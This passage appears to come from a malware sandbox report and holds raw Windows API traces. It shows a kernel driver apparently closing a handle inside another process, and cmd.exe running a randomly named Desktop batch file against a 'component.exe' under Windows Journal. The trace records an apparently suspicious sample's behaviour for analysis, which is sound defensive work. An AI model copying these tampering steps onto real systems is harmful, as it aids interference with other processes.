GetLastError () returned 0x5 [0186.924] SetLastError (dwErrCode=0x5) [0186.924] GetLastError () returned 0x5 [0186.924] SetLastError (dwErrCode=0x5) [0186.924] GetLastError () returned 0x5 [0186.924] SetLastError (dwErrCode=0x5) [0186.924] GetLastError () returned 0x5 [0186.924] SetLastError (dwErrCode=0x5) [0186.924] GetLastError () returned 0x5 [0186.925] SetLastError (dwErrCode=0x5) [0186.925] GetLastError () returned 0x5 [0186.925] SetLastError (dwErrCode=0x5) [0186.925] GetLastError () returned 0x5 [0186.925] SetLastError (dwErrCode=0x5) [0186.925] GetLastError () returned 0x5 [0186.925] SetLastError (dwErrCode=0x5) [0186.926] GetLastError () returned 0x5 [0186.926] SetLastError (dwErrCode=0x5) [0186.926] GetLastError () returned 0x5 [0186.926] SetLastError (dwErrCode=0x5) [0186.926] GetLastError () returned 0x5 [0186.926] SetLastError (dwErrCode=0x5) [0186.926] GetLastError () returned 0x5 [0186.927] SetLastError (dwErrCode=0x5) [0186.927] GetLastError () returned 0x5 [0186.927] SetLastError (dwErrCode=0x5) [0186.927] GetLastError () returned 0x5 [0186.927] SetLastError (dwErrCode=0x5) [0186.927] GetLastError () returned 0x5 [0186.928] SetLastError (dwErrCode=0x5) [0186.928] GetLastError () returned 0x5 [0186.928] SetLastError (dwErrCode=0x5) [0186.928] GetLastError () returned 0x5 [0186.928] SetLastError (dwErrCode=0x5) [0186.928] GetLastError () returned 0x5 [0186.928] SetLastError (dwErrCode=0x5) [0186.928] GetLastError () returned 0x5 [0186.929] SetLastError (dwErrCode=0x5) [0186.929] GetLastError () returned 0x5 [0186.929] SetLastError (dwErrCode=0x5) [0186.929] GetLastError () returned 0x5 [0186.929] SetLastError (dwErrCode=0x5) [0186.929] GetLastError () returned 0x5 [0186.930] SetLastError (dwErrCode=0x5) [0186.930] GetLastError () returned 0x5 [0186.930] SetLastError (dwErrCode=0x5) [0186.930] GetLastError () returned 0x5 [0186.930] SetLastError (dwErrCode=0x5) [0186.930] GetLastError () returned 0x5 [0186.931] SetLastError (dwErrCode=0x5) [0186.931] GetLastError () returned 0x5 [0186.931] SetLastError (dwErrCode=0x5) [0186.931] GetLastError () returned 0x5 [0186.931] SetLastError (dwErrCode=0x5) [0186.931] GetLastError () returned 0x5 [0186.932] SetLastError (dwErrCode=0x5) [0186.932] GetLastError () returned 0x5 [0186.932] SetLastError (dwErrCode=0x5) [0186.932] GetLastError () returned 0x5 [0186.932] SetLastError (dwErrCode=0x5) [0187.558] GetLastError () returned 0x5 [0187.558] SetLastError (dwErrCode=0x5) [0187.558] GetLastError () returned 0x5 [0187.558] SetLastError (dwErrCode=0x5) [0187.558] GetLastError () returned 0x5 [0187.559] SetLastError (dwErrCode=0x5) [0187.559] GetLastError () returned 0x5 [0187.559] SetLastError (dwErrCode=0x5) [0187.559] GetLastError () returned 0x5 [0187.559] SetLastError (dwErrCode=0x5) [0187.559] GetLastError () returned 0x5 [0187.559] SetLastError (dwErrCode=0x5) [0187.559] GetLastError () returned 0x5 [0187.559] SetLastError (dwErrCode=0x5) [0187.559] GetLastError () returned 0x5 [0187.560] SetLastError (dwErrCode=0x5) [0187.560] GetLastError () returned 0x5 [0187.560] SetLastError (dwErrCode=0x5) [0187.560] GetLastError () returned 0x5 [0187.560] SetLastError (dwErrCode=0x5) [0187.560] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12c814 | out: lpMode=0x12c814) returned 1 [0187.560] WriteFile (in: hFile=0x7, lpBuffer=0x12cee0*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x12c800, lpOverlapped=0x0 | out: lpBuffer=0x12cee0*, lpNumberOfBytesWritten=0x12c800*=0x4e, lpOverlapped=0x0) returned 1 [0188.592] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350004, lpInBuffer=0x12e470*, nInBufferSize=0x20, lpOutBuffer=0x0, nOutBufferSize=0x0, lpBytesReturned=0x12e400, lpOverlapped=0x0 | out: lpInBuffer=0x12e470*, lpOutBuffer=0x0*, lpBytesReturned=0x12e400*=0x0, lpOverlapped=0x0) returned 1 [0188.592] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab5f0 | out: Process=0xfffff88002aab5f0) returned 0x0 [0188.592] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab608 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab608) [0188.592] ObReferenceObjectByHandle (in: Handle=0x130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab5f8, HandleInformation=0xfffff88002aab600 | out: Object=0xfffff88002aab5f8*=0xfffffa8002009290, HandleInformation=0xfffff88002aab600) returned 0x0 [0188.592] ObCloseHandle (Handle=0x130, AccessMode=0x1) returned 0x0 [0188.592] ObfDereferenceObject (Object=0xfffffa8002009290) returned 0x1 [0188.592] KeUnstackDetachProcess (ApcState=0xfffff88002aab608) [0188.593] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4a [0188.593] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0188.593] GetLastError () returned 0x5 [0188.593] SetLastError (dwErrCode=0x5) [0188.593] GetLastError () returned 0x5 [0188.593] SetLastError (dwErrCode=0x5) [0188.593] GetLastError () returned 0x5 [0188.593] SetLastError (dwErrCode=0x5) [0188.593] GetLastError () returned 0x5 [0188.593] SetLastError (dwErrCode=0x5) [0188.593] GetLastError () returned 0x5 [0188.593] SetLastError (dwErrCode=0x5) [0188.593] GetLastError () returned 0x5 [0188.593] SetLastError (dwErrCode=0x5) [0188.593] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.594] SetLastError (dwErrCode=0x5) [0188.594] GetLastError () returned 0x5 [0188.595] SetLastError (dwErrCode=0x5) [0188.595] GetLastError () returned 0x5 [0188.595] SetLastError (dwErrCode=0x5) [0188.595] GetLastError () returned 0x5 [0188.595] SetLastError (dwErrCode=0x5) [0188.595] GetLastError () returned 0x5 [0188.595] SetLastError (dwErrCode=0x5) [0188.595] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12c814 | out: lpMode=0x12c814) returned 1 [0188.596] WriteFile (in: hFile=0x7, lpBuffer=0x12cee0*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x12c800, lpOverlapped=0x0 | out: lpBuffer=0x12cee0*, lpNumberOfBytesWritten=0x12c800*=0x14, lpOverlapped=0x0) returned 1 [0188.598] GetVersion () returned 0x1db10106 [0188.598] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.598] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12fec0 | out: lpConsoleScreenBufferInfo=0x12fec0) returned 1 [0188.599] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0080 | out: hHeap=0x2d0000) returned 1 [0188.600] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x12feb8 | out: phModule=0x12feb8) returned 0 [0188.600] RtlExitUserProcess (ExitCode=0x0) [0188.601] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ef050 | out: hHeap=0x2d0000) returned 1 [0188.614] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) Thread: id = 706 os_tid = 0x344 Process: id = "173" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2eea8000" os_pid = "0x6b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\component.exe\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 701 os_tid = 0xb24 [0184.517] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef814 | out: lpSystemTimeAsFileTime=0x2ef814*(dwLowDateTime=0x27354a40, dwHighDateTime=0x1d68287)) [0184.517] GetCurrentProcessId () returned 0x6b8 [0184.517] GetCurrentThreadId () returned 0xb24 [0184.517] GetTickCount () returned 0x115aac1 [0184.517] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef80c | out: lpPerformanceCount=0x2ef80c*=30549502631) returned 1 [0185.165] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0185.165] __set_app_type (_Type=0x1) [0185.165] __p__fmode () returned 0x770331f4 [0185.165] __p__commode () returned 0x770331fc [0185.165] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0185.166] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0185.166] GetCurrentThreadId () returned 0xb24 [0185.166] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb24) returned 0x60 [0185.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0185.166] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0185.166] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.167] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0185.167] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef7a4 | out: phkResult=0x2ef7a4*=0x0) returned 0x2 [0185.167] VirtualQuery (in: lpAddress=0x2ef7db, lpBuffer=0x2ef774, dwLength=0x1c | out: lpBuffer=0x2ef774*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.167] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef774, dwLength=0x1c | out: lpBuffer=0x2ef774*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0185.167] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef774, dwLength=0x1c | out: lpBuffer=0x2ef774*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0185.167] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef774, dwLength=0x1c | out: lpBuffer=0x2ef774*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.167] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef774, dwLength=0x1c | out: lpBuffer=0x2ef774*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x110000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0185.167] GetConsoleOutputCP () returned 0x1b5 [0185.167] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0185.168] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0185.168] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.168] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0185.168] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.168] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0185.169] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.169] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.169] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.169] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0185.170] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.170] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0185.170] GetEnvironmentStringsW () returned 0x6620e8* [0185.170] GetProcessHeap () returned 0x650000 [0185.170] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xaca) returned 0x662bc0 [0185.171] FreeEnvironmentStringsW (penv=0x6620e8) returned 1 [0185.171] GetProcessHeap () returned 0x650000 [0185.171] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x661888 [0185.171] GetEnvironmentStringsW () returned 0x6620e8* [0185.171] GetProcessHeap () returned 0x650000 [0185.171] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xaca) returned 0x663698 [0185.171] FreeEnvironmentStringsW (penv=0x6620e8) returned 1 [0185.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee714 | out: phkResult=0x2ee714*=0x68) returned 0x0 [0185.171] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x0, lpData=0x2ee720*=0x0, lpcbData=0x2ee718*=0x1000) returned 0x2 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x4, lpData=0x2ee720*=0x1, lpcbData=0x2ee718*=0x4) returned 0x0 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x0, lpData=0x2ee720*=0x1, lpcbData=0x2ee718*=0x1000) returned 0x2 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x4, lpData=0x2ee720*=0x0, lpcbData=0x2ee718*=0x4) returned 0x0 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x4, lpData=0x2ee720*=0x40, lpcbData=0x2ee718*=0x4) returned 0x0 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x4, lpData=0x2ee720*=0x40, lpcbData=0x2ee718*=0x4) returned 0x0 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x0, lpData=0x2ee720*=0x40, lpcbData=0x2ee718*=0x1000) returned 0x2 [0185.172] RegCloseKey (hKey=0x68) returned 0x0 [0185.172] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee714 | out: phkResult=0x2ee714*=0x68) returned 0x0 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x0, lpData=0x2ee720*=0x40, lpcbData=0x2ee718*=0x1000) returned 0x2 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x4, lpData=0x2ee720*=0x1, lpcbData=0x2ee718*=0x4) returned 0x0 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x0, lpData=0x2ee720*=0x1, lpcbData=0x2ee718*=0x1000) returned 0x2 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x4, lpData=0x2ee720*=0x0, lpcbData=0x2ee718*=0x4) returned 0x0 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x4, lpData=0x2ee720*=0x9, lpcbData=0x2ee718*=0x4) returned 0x0 [0185.172] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x4, lpData=0x2ee720*=0x9, lpcbData=0x2ee718*=0x4) returned 0x0 [0185.173] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee71c, lpData=0x2ee720, lpcbData=0x2ee718*=0x1000 | out: lpType=0x2ee71c*=0x0, lpData=0x2ee720*=0x9, lpcbData=0x2ee718*=0x1000) returned 0x2 [0185.173] RegCloseKey (hKey=0x68) returned 0x0 [0185.173] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2d5 [0185.173] srand (_Seed=0x5f51e2d5) [0185.173] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\component.exe\"\"" [0185.173] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\component.exe\"\"" [0185.173] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0185.174] GetProcessHeap () returned 0x650000 [0185.174] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x210) returned 0x6620e8 [0185.174] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6620f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0185.174] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.174] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.174] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.175] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0185.175] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0185.175] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0185.175] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0185.175] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0185.175] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0185.175] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0185.175] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0185.175] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0185.175] GetProcessHeap () returned 0x650000 [0185.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x662bc0 | out: hHeap=0x650000) returned 1 [0185.175] GetEnvironmentStringsW () returned 0x662300* [0185.175] GetProcessHeap () returned 0x650000 [0185.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xae2) returned 0x664c60 [0185.175] FreeEnvironmentStringsW (penv=0x662300) returned 1 [0185.175] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.175] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.175] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0185.175] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0185.175] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0185.176] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0185.176] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0185.176] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0185.176] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0185.176] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0185.176] GetProcessHeap () returned 0x650000 [0185.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x6617b8 [0185.176] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef4e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0185.176] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef4e0, lpFilePart=0x2ef4dc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef4dc*="Desktop") returned 0x25 [0185.176] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0185.176] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef25c | out: lpFindFileData=0x2ef25c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x665750 [0185.176] FindClose (in: hFindFile=0x665750 | out: hFindFile=0x665750) returned 1 [0185.176] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef25c | out: lpFindFileData=0x2ef25c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x665750 [0185.177] FindClose (in: hFindFile=0x665750 | out: hFindFile=0x665750) returned 1 [0185.177] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0185.177] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef25c | out: lpFindFileData=0x2ef25c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x665750 [0185.177] FindClose (in: hFindFile=0x665750 | out: hFindFile=0x665750) returned 1 [0185.177] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0185.177] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0185.177] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0185.177] GetProcessHeap () returned 0x650000 [0185.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664c60 | out: hHeap=0x650000) returned 1 [0185.177] GetEnvironmentStringsW () returned 0x664170* [0185.177] GetProcessHeap () returned 0x650000 [0185.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb36) returned 0x665f90 [0185.178] FreeEnvironmentStringsW (penv=0x664170) returned 1 [0185.178] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0185.178] GetProcessHeap () returned 0x650000 [0185.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6617b8 | out: hHeap=0x650000) returned 1 [0185.178] GetProcessHeap () returned 0x650000 [0185.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400e) returned 0x666ad0 [0185.178] GetProcessHeap () returned 0x650000 [0185.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xdc) returned 0x662e40 [0185.178] GetProcessHeap () returned 0x650000 [0185.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4008) returned 0x66aae8 [0185.179] GetProcessHeap () returned 0x650000 [0185.179] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4008) returned 0x66eaf8 [0185.179] GetProcessHeap () returned 0x650000 [0185.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x666ad0 | out: hHeap=0x650000) returned 1 [0185.179] GetConsoleOutputCP () returned 0x1b5 [0185.179] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0185.180] GetUserDefaultLCID () returned 0x409 [0185.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0185.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef620, cchData=128 | out: lpLCData="0") returned 2 [0185.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef620, cchData=128 | out: lpLCData="0") returned 2 [0185.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef620, cchData=128 | out: lpLCData="1") returned 2 [0185.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0185.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0185.181] GetLocaleInfoW (in: 